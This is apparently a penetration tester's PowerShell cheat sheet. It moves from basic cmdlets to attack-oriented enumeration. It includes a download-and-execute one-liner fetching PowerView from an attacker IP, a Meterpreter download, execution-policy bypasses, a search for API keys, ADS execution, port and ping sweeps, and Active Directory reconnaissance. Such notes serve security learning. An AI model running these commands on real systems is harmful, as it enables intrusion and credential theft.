# Powershell Usage ## Get-Help ``` Get-Help Command-Name ``` * Show examples ``` Get-Help Command-Name -Examples ``` * Get-Command gets all the cmdlets installed on the current Computer. ``` Get-Command ``` ``` Get-Command Verb-* Get-Command Invoke-* Get-Command Get-* ``` ## Passing Output via Pipe * A pipe passes object including methods and attributes. ``` Verb-Noun | Get-Member ``` ``` Get-Command | Get-Member -MemberType Method ``` ## Creating Objects from Previous Cmdlets ``` Get-ChildItem | Select-Object -Property Mode, Name ``` * first - gets the first x object * last - gets the last x object * unique - shows the unique objects * skip - skips x objects ## Filtering Objects ``` Verb-Noun | Where-Object -Property PropertyName -operator Value Verb-Noun | Where-Object {$_.PropertyName -operator Value} ``` The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet. * Where -operator is a list of the following operators: * -Match: matches the exact value of the property * -Contains: if any item in the property value is an exact match for the specified value * -EQ: if the property value is the same as the specified value * -GT: if the property value is greater than the specified value ### Out-Gridview Pipe the output to a graphical window and Filter it through the GUI. ``` whatever | Out-GridView ``` ## Sort Object ``` Verb-Noun | Sort-Object ``` ``` Get-ChildItem | Sort-Object ``` ## Finding a File ``` Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'} ``` ```sh Get-HotFix | Format-list | findstr ``` ```sh Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue ``` * Find backup files ```sh Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue ``` * Find file contents ```sh Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY ``` ## Showing File Content ``` Get-Content 'C:\Program Files\interesting-file.txt' ``` * Indexing lines ```sh (Get-Content -Path file.txt)[index] ``` * Search ```sh Select-String -Pattern ``` ## Copy File Content ```sh Copy-Item ``` ## Count Lines of Output As an example, count all cmdlets on the system ``` Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object ``` ## Count Words ``` Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word ``` ## Checksum of File ``` Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt' ``` ## Current Working Directory ``` Get-Location ``` ## File Metadata ```sh ls | Format-List * ``` ## Web Request ```sh Invoke-Webrequest -Uri 'http:// -OutFile ``` ```sh (New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1') ``` * Webrequest and execute in one go ```sh powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description" ``` ## Base64 Decode File ``` [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt))) ``` ## **Circumvent Execution-Policy** ```sh powershell -ExecutionPolicy Bypass -File .\ ``` ```sh Set-ExecutionPolicy Bypass -Scope Process ``` ## Enumeration ### Users ``` Get-LocalUser ``` * Password not required users ``` Get-LocalUser | Where-Object -Property PasswordRequired -Match false ``` * SID of users ``` Get-WmiObject win32_useraccount | Select name, sid ``` ### Network intel * Connections ```sh netstat -ano ``` * IP Address ``` Get-NetIpAddress ``` * Listening TCP Ports ``` Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure ``` * TCP Port by number ``` Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443 ``` ### Patch level and updates ``` Get-Hotfix ``` * Find patch by HotFixID ``` Get-Hotfix | Where-Object -Property HotFixID -Match KB124284 ``` ```sh wmic qfe get Caption,Description,HotFixID,InstalledOn ``` ### Drivers ```sh driverquery ``` ### Processes * Start processes ```sh Start-Process ``` * Running processes ```sh Get-Process ``` ### Scheduled tasks ```sh schtasks /query /fo LIST /v ``` ```sh Get-ScheduledTaskInfo ``` * Scheduled Tasks, by TaskName ``` Get-ScheduledTask | Where-Object -Property TaskName -Match taskname ``` or ``` Get-ScheduledTask -TaskName taskname ``` ### Alternate Data Stream(ADS) * Show ADS ```sh Get-Item -Path file.exe -Stream * ``` * Open ADS ```sh wmic process call create $(Resolve-Path file.exe:streamname) ``` ### Export Output * Export as CSV ```sh Get-Process | Export-Csv ``` ### ACL * Owner of files ``` Get-ACL C:\ ``` ### Port Scanner ``` for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i} ``` ### Ping Hosts ```sh 1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl} ``` ### Antivirus ```sh sc query windefend ``` * Service name unknown ```sh sc queryex type=service ``` ### Using Powerview ```sh Import-Module .\powerview.ps1 Get-NetDomainController (Get-NetUser).name Get-NetUser -properties description Get-NetUser | select -ExpandProperty lastlogon Get-NetComputer -ping Get-NetGroupMember "Domain Admins" Find-DomainShare -CheckShareAccess ``` * Enumerate Group Policy ```sh Get-NetGPO ``` * Trust relationship to other domains ```sh Get-NetDomainTrust ``` * User enumeration ```sh Find-LocalAdminAccess ``` ```sh whoami /priv ``` ``` Import-Module ActiveDirectory Get-ADGroup Get-ADGroupMember Get-ADPrincipalGroupMembership ``` ### Services List services that are running or stopped but always started automatically after reboot in the following way. ```sh Get-Service | Where-Object {$_.State -eq "Running" -and $_.StartType -eq "Automatic"} Get-Service | Where-Object {$_.State -eq "Stopped" -and $_.StartType -eq "Automatic"} ```